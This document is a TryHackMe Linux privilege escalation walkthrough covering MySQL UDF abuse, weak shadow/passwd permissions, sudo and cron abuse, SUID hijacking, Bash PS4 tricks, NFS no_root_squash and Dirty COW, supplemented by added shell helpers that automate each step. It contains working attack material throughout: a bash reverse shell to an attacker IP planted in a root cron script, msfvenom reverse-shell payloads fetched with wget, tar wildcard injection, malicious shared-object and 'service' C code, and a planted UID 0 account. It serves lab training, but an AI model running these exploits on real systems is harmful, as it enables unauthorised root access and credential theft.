Linux Privilege Escalation from TryHackMe

1. Service Exploits

In this scenario, MySQL is running as root and the root database user has no password. A user-defined function (UDF) compiled from raptor_udf2.c can then be loaded into the server and used to run shell commands as root. Compile the shared object on the target and log in:

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
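The SQL side of the technique, which the compile commands lead up to, is not on the page. The following is an added example (not part of the original write-up): a helper that emits the statements for loading the library and calling its function, plus a precondition check. It assumes raptor_udf2.so exports do_system (raptor_udf2.c does), that mysql -u root logs in without a password, and that the plugin directory passed in is the one the server reports for select @@plugin_dir; (the default used below is a common Debian location; older MySQL releases loaded UDFs from the system library path instead).

```shell
# Added example, not part of the original write-up: emit the SQL that loads the
# compiled raptor_udf2.so into MySQL and runs a command through do_system().
udf_sql() {
    so_path="$1"                                  # compiled raptor_udf2.so on the target
    plugin_dir="${2:-/usr/lib/mysql/plugin}"      # assumption; confirm with: select @@plugin_dir;
    cmd="$3"                                      # runs as the mysqld user, i.e. root here
    cat <<EOF
use mysql;
create table foo(line blob);
insert into foo values(load_file('$so_path'));
select * from foo into dumpfile '$plugin_dir/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('$cmd');
EOF
}

# Precondition check: is mysqld running as root? Feed it `ps -ef` output on stdin;
# exit status 0 means yes. Without this the UDF only runs as the mysql user.
mysqld_runs_as_root() {
    awk '$1 == "root" && $0 ~ /mysqld/ { found = 1 } END { exit !found }'
}

# Typical use on the target (not run here): drop a SUID copy of bash, then
# start it with `/tmp/rootbash -p`.
#   ps -ef | mysqld_runs_as_root && \
#   udf_sql ./raptor_udf2.so /usr/lib/mysql/plugin \
#       'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' | mysql -u root
```

The dumpfile step matters: load_file reads the library into the database and dumpfile writes it back out owned by the mysqld user, which is how a file lands in a plugin directory the shell user cannot write.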

2. Weak File Permissions (Readable /etc/shadow file)

Here we assume that /etc/shadow is readable by the current user (by default only root and the shadow group can read it). Copy the root user's hash into hash.txt and crack it offline:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

3. Weak File Permissions (Writable /etc/shadow file)

In this scenario, we assume that the user has write access to /etc/shadow. Generate a SHA-512 hash of a password of our choosing (this runs on the attacking machine and needs no root), paste it into the second field of the root entry, then su root with the new password:

mkpasswd -m sha-512 newpass123

4. Weak File Permissions (Writable /etc/passwd file)

In this scenario, we assume that /etc/passwd is writable. By default it is writable only by root. Either replace the x in root's second field with a hash generated as above, or append a new entry with UID 0 (for example newroot:<hash>:0:0:root:/root:/bin/bash) and su to that user.
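Added example, not part of the original write-up: helpers for the three weak-permission scenarios above (readable shadow, writable shadow, writable passwd). They check what access you have, merge passwd and shadow the way unshadow does for john, and plant a known root hash where a file is writable. The hash normally comes from mkpasswd -m sha-512 newpass123 or openssl passwd -6 newpass123 on the attacking machine; the strings in the demo data are placeholders, not real hashes, and the files are copies in a temporary directory.

```shell
# Added example, not part of the original write-up.

# Print the current user's access to a file: r, w, rw or none.
file_access() {
    a=""
    [ -r "$1" ] && a="${a}r"
    [ -w "$1" ] && a="${a}w"
    printf '%s\n' "${a:-none}"
}

# Merge like unshadow(8): passwd lines with field 2 replaced by the shadow hash,
# ready for `john --wordlist=/usr/share/wordlists/rockyou.txt merged.txt`.
unshadow_files() {
    awk -F: -v OFS=: 'NR == FNR { h[$1] = $2; next } ($1 in h) { $2 = h[$1] } { print }' "$2" "$1"
}

# Replace the hash field of one account in a writable shadow file. The result is
# written back through cat so the file keeps its owner and mode (mv would need
# write access to /etc and would change the owner).
set_shadow_hash() {
    tmp=$(mktemp)
    awk -F: -v OFS=: -v u="$2" -v h="$3" '$1 == u { $2 = h } { print }' "$1" > "$tmp"
    cat "$tmp" > "$1" && rm -f "$tmp"
}

# Append a UID 0 account to a writable passwd file; with the hash in field 2 no
# shadow entry is consulted, so `su newroot` works with the chosen password.
add_root_user() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$2" "$3" >> "$1"
}

# Constructed demo copies (not real system files, not real hashes).
demo_dir=$(mktemp -d)
printf 'root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n' > "$demo_dir/passwd"
printf 'root:$6$saltsalt$FAKEHASHFORDEMOONLY:18000:0:99999:7:::\nuser:$6$saltsalt$ANOTHERFAKEHASH:18000:0:99999:7:::\n' > "$demo_dir/shadow"
```

On a target, file_access /etc/shadow tells you which of the three scenarios applies; unshadow_files /etc/passwd /etc/shadow > merged.txt is the readable case, and the other two functions are the writable cases.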

5. Sudo shell escape sequences

In this scenario, we assume that the user can run certain Unix binaries through sudo. Let's find out which ones:

sudo -l

Many such binaries (find, awk, vim, less, nmap, ...) can spawn a shell from inside; GTFOBins (https://gtfobins.github.io) catalogues the escape for each.
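Added example, not part of the original write-up: a helper that reads sudo -l output and pairs each permitted binary with the shell escape documented for it on GTFOBins. The table covers a handful of common binaries only; the sudo -l text in the usage comment is constructed.

```shell
# Added example, not part of the original write-up. Pipe `sudo -l` into it.
sudo_escapes() {
    # Lines granting commands look like: "(root) NOPASSWD: /usr/bin/find, /usr/bin/awk"
    grep '^ *(' | sed 's/^ *([^)]*) *//; s/NOPASSWD: *//; s/SETENV: *//' | tr ',' '\n' |
    sed 's/^ *//; s/ .*//' |
    while read -r path; do
        [ -n "$path" ] || continue
        bin=${path##*/}
        case "$bin" in
            ALL)       esc="sudo /bin/sh (any command is permitted)" ;;
            find)      esc="sudo $path . -exec /bin/sh \\; -quit" ;;
            awk)       esc="sudo $path 'BEGIN {system(\"/bin/sh\")}'" ;;
            vim|vi)    esc="sudo $path -c ':!/bin/sh'" ;;
            less|more)  esc="sudo $path /etc/profile, then type !/bin/sh at the pager prompt" ;;
            man)       esc="sudo $path man, then type !/bin/sh at the pager prompt" ;;
            nano)      esc="sudo $path, then ^R ^X and run: reset; sh 1>&0 2>&0" ;;
            ftp)       esc="sudo $path, then type !/bin/sh" ;;
            nmap)      esc="sudo $path --interactive, then !sh (old nmap releases only)" ;;
            perl)      esc="sudo $path -e 'exec \"/bin/sh\";'" ;;
            python|python2|python3) esc="sudo $path -c 'import os; os.system(\"/bin/sh\")'" ;;
            env)       esc="sudo $path /bin/sh" ;;
            *)         esc="no shell escape in this table; look it up on https://gtfobins.github.io" ;;
        esac
        printf '%s -> %s\n' "$path" "$esc"
    done
    return 0
}

# Usage on a target:  sudo -l | sudo_escapes
# Constructed sample of what `sudo -l` prints, for trying the parser offline:
#     User user may run the following commands on this host:
#         (root) NOPASSWD: /usr/bin/find, /usr/bin/awk, /usr/bin/vim
#         (root) NOPASSWD: /usr/sbin/apache2
```

Any argument restrictions after the binary name are dropped by the parser, so check the full sudo -l line before trusting an escape: a rule such as /usr/bin/find /var/log limits what find may be run against.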

6. cron jobs — File Permissions

In this scenario, we assume that a script run by a cron job as root has weak file permissions, so any user can edit it. Find the job, locate the script and check who can write it:

cat /etc/crontab
locate overwrite.sh
ls -l /usr/local/bin/overwrite.sh

Append the following line to the script, start a listener (nc -nlvp 5566) on the attacking machine and wait for the job to fire:

bash -i >& /dev/tcp/10.9.0.56/5566 0>&1

7. cron jobs — PATH Environment Variables

In this scenario, we assume that the PATH line in /etc/crontab starts with /home/user and that a cron job calls overwrite.sh without an absolute path. cron therefore searches /home/user first, and a script of that name placed there runs as root instead of the real one. Create /home/user/overwrite.sh with the following contents:

cd /home/user

#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

Make it executable, wait for the job to run, then start the SUID copy of bash with -p so it keeps the root effective UID:

chmod +x /home/user/overwrite.sh
/tmp/rootbash -p
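Added example, not part of the original write-up: triage for the two cron scenarios. Given a system crontab (/etc/crontab format: five time fields, the user, then the command) it reports every absolute path in a command that the current user can write (the file-permission case) and every command given as a bare name, which cron resolves through the crontab's own PATH line (the PATH case), together with the first writable directory on that PATH. The sample crontab and all paths are constructed in a temporary directory.

```shell
# Added example, not part of the original write-up.
cron_targets() {
    f="$1"
    cron_path=$(grep '^PATH=' "$f" | tail -n 1 | cut -d= -f2-)
    # Drop comments, blank lines, VAR=value lines and @reboot-style entries,
    # then strip the five time fields and the user to leave the command.
    grep -v '^[[:space:]]*#' "$f" | grep -v '^[[:space:]]*$' | grep -v '^[A-Za-z_][A-Za-z0-9_]*=' | grep -v '^@' |
    awk '{ $1=$2=$3=$4=$5=$6=""; sub(/^ +/, ""); print }' |
    while read -r cmd; do
        set -f                              # a literal * in the command must not glob here
        first=${cmd%% *}
        case "$first" in
            */*) ;;                         # a path: only the writability check below applies
            *)   printf 'PATH-LOOKUP %s via PATH=%s\n' "$first" "$cron_path" ;;
        esac
        for word in $cmd; do
            case "$word" in
                /*) if [ -w "$word" ]; then printf 'WRITABLE %s\n' "$word"; fi ;;
            esac
        done
        set +f
    done
    return 0
}

# First directory in a colon-separated PATH the current user can write to: that
# is where a hijacking script (overwrite.sh on the page) goes.
first_writable_pathdir() {
    old_ifs=$IFS; IFS=:
    for d in $1; do
        if [ -d "$d" ] && [ -w "$d" ]; then IFS=$old_ifs; printf '%s\n' "$d"; return 0; fi
    done
    IFS=$old_ifs
    return 1
}

# Constructed demo crontab (not a real system file).
demo=$(mktemp -d)
mkdir "$demo/home"
printf '#!/bin/bash\necho backup\n' > "$demo/writable.sh"; chmod 755 "$demo/writable.sh"
cat > "$demo/crontab" <<EOF
# m h dom mon dow user  command
PATH=$demo/home:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root overwrite.sh
* * * * * root $demo/writable.sh
* * * * * root $demo/does-not-exist.sh
EOF
```

On a target: cron_targets /etc/crontab, then first_writable_pathdir on the PATH it prints. User crontabs (crontab -l) have no user field and are not handled by this parser.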

8. cron jobs — Wildcards

In this scenario, we abuse how the shell expands wildcards. A cron job (compress.sh) runs the following command from /home/user, so every filename in that directory becomes an argument to tar:

tar czf /tmp/backup.tar.gz *

GNU tar accepts options anywhere on the command line, and --checkpoint-action=exec=... runs a command when a checkpoint is reached. Passed directly, the two options below spawn a shell (this is also the sudo escape for tar):

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Filenames that look like these options get the same treatment. First build a reverse shell matching the target's architecture:

msfvenom -l payloads | grep linux
user@debian:~$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
msfvenom --list formats
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.56 LPORT=5555 -f elf -o shell.elf

Serve it from the attacking machine, fetch it on the target into /home/user (and mark it executable), then start a listener:

python3 -m http.server 9999
wget http://10.9.0.56:9999/shell.elf
nc -nlvp 5555

Finally create the two option-named files in the directory the cron job archives and wait for it to run. The exec command is run through /bin/sh -c, so a bare shell.elf is found only because the cron job's PATH includes /home/user (the same PATH entry abused in the previous scenario); otherwise give a path:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
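Added example, not part of the original write-up: reproduce the wildcard injection locally as the current user, to see that tar ... * run inside a directory really executes a file named like a tar option. The payload only creates a marker file here; on the target it is the reverse shell above. It needs GNU tar (--checkpoint is a GNU extension); gzip is left out (cf instead of czf) because it changes nothing about the option handling. All directories are temporary ones created by the script.

```shell
# Added example, not part of the original write-up.
wildcard_demo() {
    work=$(mktemp -d)            # stands in for /home/user
    out=$(mktemp -d)             # stands in for /tmp
    # What the cron job's tar will end up running (as root on the target).
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$out" > "$work/payload.sh"
    # Filenames that the glob turns into tar options. The exec command is run
    # through /bin/sh -c, so a bare "shell.elf" (as on the page) is looked up in
    # the cron job's PATH; "sh payload.sh" works regardless of PATH.
    touch "$work/--checkpoint=1"
    touch "$work/--checkpoint-action=exec=sh payload.sh"
    # The cron job: archive everything in the directory with a wildcard.
    (cd "$work" && tar cf "$out/backup.tar" *)
    [ -f "$out/pwned" ]          # true if tar ran the payload
}
```

Run wildcard_demo; a zero exit status means the marker was created, i.e. the two option files were enough to make tar run the payload even though tar was never told about them explicitly.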

9. SUID /SGID Executables Known Exploits

In this scenario, we assume that a SUID executable is a version affected by a known, public exploit. List the SUID/SGID files, check the version of anything unusual and search exploit-db or searchsploit for it:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

10. SUID /SGID Shared Objects Injection

In this scenario, we assume that a SUID executable tries to load a shared object from a path we can write to ("shared object injection"). Find the binary, then trace it to see which library it looks for and fails to find:

lse.sh -l 1 -i | more
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"

The trace shows suid-so trying to open libcalc.so inside a .config directory under the user's home that does not exist yet. Create the directory and a library whose constructor runs as soon as it is loaded:

mkdir .config
cd .config

libcalc.c:

#include <stdio.h>
#include <stdlib.h>

/* Runs automatically when the SUID binary loads this library. */
static void inject() __attribute__((constructor));

void inject() {
    system("/bin/bash -p");
}

Compile it to a .so with the name the binary expects, then run the binary:

gcc -shared -fPIC -o libcalc.so libcalc.c
/usr/local/bin/suid-so
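Added example, not part of the original write-up: two triage helpers for the SUID scenarios (known exploits and shared object injection). One lists setuid/setgid files under a directory tree and drops the names a stock install is expected to carry; the other pulls the libraries a binary failed to open out of an strace log and reports the ones under a directory you can create or write in. The baseline list and the strace lines are constructed for the demo and are not from the page.

```shell
# Added example, not part of the original write-up.
suid_sgid_list() {
    find "${1:-/}" -type f \( -perm -u+s -o -perm -g+s \) 2>/dev/null
}

# Names a stock Debian/Ubuntu usually carries with the setuid bit (assumed
# baseline; extend it for the target). Anything else (suid-so, suid-env, ...)
# deserves a look.
BASELINE="passwd chsh chfn gpasswd newgrp su sudo mount umount ping ping6 fusermount pkexec"

unusual_suid() {
    suid_sgid_list "$1" | while read -r f; do
        name=${f##*/}
        case " $BASELINE " in
            *" $name "*) ;;                  # expected on a stock system, skip
            *) printf '%s\n' "$f" ;;
        esac
    done
    return 0
}

# From strace output on stdin, the .so paths the binary tried and did not find
# (the ENOENT lines that `strace ... | grep -iE "open|access|no such file"` shows).
missing_libs() {
    grep ENOENT | grep -o '"[^"]*\.so[^"]*"' | tr -d '"' || true
}

# Nearest existing ancestor of a path (the directory you would have to create in).
first_existing_parent() {
    p=$(dirname "$1")
    while [ ! -e "$p" ] && [ "$p" != / ]; do p=$(dirname "$p"); done
    printf '%s\n' "$p"
}

# Missing libraries whose nearest existing parent is writable by us: these are
# the injection points. Usage: strace BIN 2>&1 | injectable_libs
injectable_libs() {
    missing_libs | while read -r lib; do
        parent=$(first_existing_parent "$lib")
        if [ -w "$parent" ]; then printf '%s (can create under %s)\n' "$lib" "$parent"; fi
    done
    return 0
}
```

Loader search-path misses (for example under /lib or /usr/lib) show up too; they only matter if one of those directories is writable, which injectable_libs checks for you.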

11. SUID /SGID Environment Variables

Let's find the files with the SUID bit set, then look at what suid-env executes. strings shows it calling service without an absolute path, and strace confirms the execve:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strings /usr/local/bin/suid-env
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service

Because the name is resolved through PATH, we can put our own service first. service.c:

#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);                 /* real UID to root as well, so the shell keeps it */
    system("/bin/bash -p");
    return 0;
}

Compile it and run the SUID binary with the current directory at the front of PATH:

gcc -o service service.c
PATH=.:$PATH /usr/local/bin/suid-env
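Added example, not part of the original write-up. It shows the mechanism the cron PATH scenario (7) and suid-env (11) share: a program that runs a bare command name gets whatever the first matching PATH entry holds. The demo runs as the current user, so the planted script only records which UID ran it; on the target the same lookup happens with root's privileges and the planted file carries the page's rootbash payload instead. All directories are temporary ones created by the script.

```shell
# Added example, not part of the original write-up.

# Put a script called NAME into DIR that appends the executing UID to LOG.
# On the target the body is the page's payload instead:
#   cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
plant() {
    printf '#!/bin/sh\nid -u >> "%s"\n' "$3" > "$1/$2"
    chmod 755 "$1/$2"
}

# Which file does a bare NAME resolve to under PATH=SEARCH? First hit wins,
# which is why /home/user at the front of the crontab PATH, or . at the front of
# ours, beats /usr/sbin/service or the real overwrite.sh.
resolve_in_path() {
    name="$1"; search="$2"; old_ifs=$IFS; IFS=:
    for dir in $search; do
        if [ -x "$dir/$name" ]; then IFS=$old_ifs; printf '%s\n' "$dir/$name"; return 0; fi
    done
    IFS=$old_ifs
    return 1
}

# Simulate the victim: suid-env calls system("service ..."), i.e. /bin/sh -c
# with that string, with the attacker's directory first in PATH just like
# `PATH=.:$PATH /usr/local/bin/suid-env`. Prints the UID the planted script saw.
hijack_demo() {
    tmp=$(mktemp -d)
    plant "$tmp" service "$tmp/log"
    PATH="$tmp:$PATH" sh -c 'service apache2 start'
    cat "$tmp/log"
}
```

A shell script works as the planted service as long as the binary keeps its effective UID 0 when running it; the page compiles a C program that also calls setuid(0), which is needed only because bash drops an effective UID that differs from the real one unless started with -p.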

12. Abusing Shell Features (Bash allows forward slashes in function names)

In this scenario, we assume that the target's Bash is older than 4.2-048 (the room's is 4.1). Those versions import exported shell functions whose names contain slashes, so a function named /usr/sbin/service shadows the real program even when it is called by its absolute path. suid-env2 does exactly that, as strace shows. Check the Bash version, define and export the function, then run the binary:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/local/bin/suid-env2
strace -v -f -e execve /usr/local/bin/suid-env2 2>&1 | grep service
/bin/bash --version
function /usr/sbin/service { "/bin/sh" -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2

13. Abusing Shell Features (Bash expands PS4 in debug mode)

In this scenario, we assume the target's Bash is older than 4.4. With xtrace debugging on, Bash prints PS4 before each command and expands it first, including any $(...) inside it. SHELLOPTS=xtrace can be pushed into the environment of a SUID binary that calls /bin/sh, so PS4 becomes a way to run a command as root (newer Bash ignores both when running setuid). Find the SUID file, confirm it calls a shell, check the version, test with a harmless PS4, then use one that drops a SUID copy of bash:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace -v -f -e execve /usr/local/bin/suid-env2 2>&1 | grep service
/bin/bash --version
env -i SHELLOPTS=xtrace PS4=test /usr/local/bin/suid-env2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
14. Passwords in history files

Shell history files often hold passwords typed on the command line. Read them and try any password found:

cat ~/.*history | less
su root

15. Passwords stored in Config Files

In this scenario, we assume that passwords and keys are stored in configuration files. Look through the readable config files (web application configs, VPN profiles, service configs under /etc and in home directories) for credentials and try them against su and ssh.

16. SSH Keys stored insecurely

In this scenario, we assume that a user has left a private key somewhere readable. Hidden directories at the root of the filesystem are worth a look:

ls -al /
ls -l /.ssh
cat /.ssh/root_key

Copy the key to the attacking machine (paste it into a file with vi), restrict its permissions (ssh refuses a key that is group- or world-readable) and log in with it:

vi root_key
chmod 600 root_key
ssh -i root_key root@10.10.121.113
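Added example, not part of the original write-up: a sweep for the two things the last two scenarios look for, credential-looking lines in config files and private keys, plus the install step that gives a found key the mode ssh insists on. The files are constructed in a temporary directory; on a target point the functions at /etc, /var/www, /opt and the home directories.

```shell
# Added example, not part of the original write-up.

# Text files containing an assignment of a password/secret/API key.
config_secrets() {
    grep -rEinI '(passw(or)?d|secret|api[_-]?key)[[:space:]]*[=:]' "$@" 2>/dev/null || true
}

# Private keys (PEM header) with their mode; a key readable by others is both
# the finding and the reason ssh will refuse to use it as it is.
private_keys() {
    grep -rlI -e '-----BEGIN .*PRIVATE KEY-----' "$@" 2>/dev/null | while read -r k; do
        printf '%s %s\n' "$(stat -c %a "$k")" "$k"
    done
    return 0
}

# Copy a key into place with mode 600 (what `chmod 600 root_key` on the page
# does before `ssh -i root_key root@HOST`); prints the resulting mode.
install_key() {
    cp "$1" "$2" && chmod 600 "$2" && stat -c %a "$2"
}

# Constructed demo tree: a web config with a password and a world-readable key
# (the key body is a placeholder, not key material).
demo=$(mktemp -d)
mkdir -p "$demo/var/www/app" "$demo/.ssh"
printf 'db_host=localhost\ndb_user=app\ndb_password=Summer2021!\n' > "$demo/var/www/app/config.ini"
printf -- '-----BEGIN RSA PRIVATE KEY-----\nNOTAREALKEY\n-----END RSA PRIVATE KEY-----\n' > "$demo/.ssh/root_key"
chmod 644 "$demo/.ssh/root_key"
```

config_secrets is deliberately broad and will produce noise (comments, example values); read the hits rather than feeding them blindly to su.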

17. Abusing NFS (no_root_squash)

In this scenario, the target exports a directory with the no_root_squash option, so files created by root on an NFS client keep root ownership. Find the export, mount it as root on the attacking machine, drop a binary that runs a shell and give it the SUID bit; on the target the file is then root-owned and SUID, so running it (the last command, on the target, where the export is /tmp) gives a root shell:

./lse.sh -l 1
showmount -e <victim ip>
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.41.239:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
/tmp/shell.elf
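Added example, not part of the original write-up: the server-side condition this scenario depends on is an export with no_root_squash, and the function below reads an /etc/exports-style file and prints the shares that are both writable and not root-squashed. The sample file is constructed; on a target read /etc/exports directly, or compare with showmount -e from the attacking machine.

```shell
# Added example, not part of the original write-up.
risky_exports() {
    # /etc/exports lines: "/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)"
    # A share is only useful for this attack if it is rw AND no_root_squash;
    # root_squash (the default) maps client root to nobody.
    grep -v '^[[:space:]]*#' "$1" | awk '
        NF >= 2 {
            for (i = 2; i <= NF; i++)
                if ($i ~ /\(.*rw.*\)/ && $i ~ /no_root_squash/) { print $1 " " $i; break }
        }'
    return 0
}

# Constructed sample (not a real /etc/exports).
demo=$(mktemp -d)
cat > "$demo/exports" <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(rw,sync,root_squash)
/srv/ro *(ro,no_root_squash)
EOF
```

Each line risky_exports prints is a share where the mount / msfvenom / chmod +xs sequence above will produce a root-owned SUID file.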

18. Kernel Exploits

In this scenario, we exploit a vulnerability in the kernel itself. Run an exploit suggester against the kernel version, then compile and run a matching exploit. Here the Dirty COW variant c0w overwrites /usr/bin/passwd with a program that spawns a root shell and keeps a backup in /tmp/bak; restore the original once you have root. Kernel exploits can crash the target, so try them last:

perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
/usr/bin/passwd
mv /tmp/bak /usr/bin/passwd
exit
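Added example, not part of the original write-up: a version-range sanity check of the kind linux-exploit-suggester performs, for the one exploit the page uses. Dirty COW (CVE-2016-5195) affects mainline kernels from 2.6.22 up to the fix in 4.8.3; distributions backported the fix into older version numbers, so "yes" here means "worth trying", not "guaranteed". The input is the text of uname -r (the third field of the uname -a output shown earlier).

```shell
# Added example, not part of the original write-up.

# Turn "2.6.32-5-amd64" into a comparable integer: major*1e6 + minor*1e3 + patch.
# A missing patch level ("4.8") counts as 0.
kver_num() {
    printf '%s\n' "$1" | awk -F'[.-]' '{ printf "%d\n", $1 * 1000000 + $2 * 1000 + $3 }'
}

# Is this kernel version inside the Dirty COW range [2.6.22, 4.8.3)?
dirtycow_candidate() {
    v=$(kver_num "$1")
    lo=$(kver_num 2.6.22)
    hi=$(kver_num 4.8.3)
    if [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]; then echo yes; else echo no; fi
}

# Usage on a target:  dirtycow_candidate "$(uname -r)"
```

For the page's target, 2.6.32-5-amd64 falls inside the range, which agrees with the suggester and with c0w working there. A "no" is reliable for mainline versions; a "yes" on a distribution kernel still needs the distribution's changelog checked, since the fix was backported into many 2.6.32 and 3.x packages.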
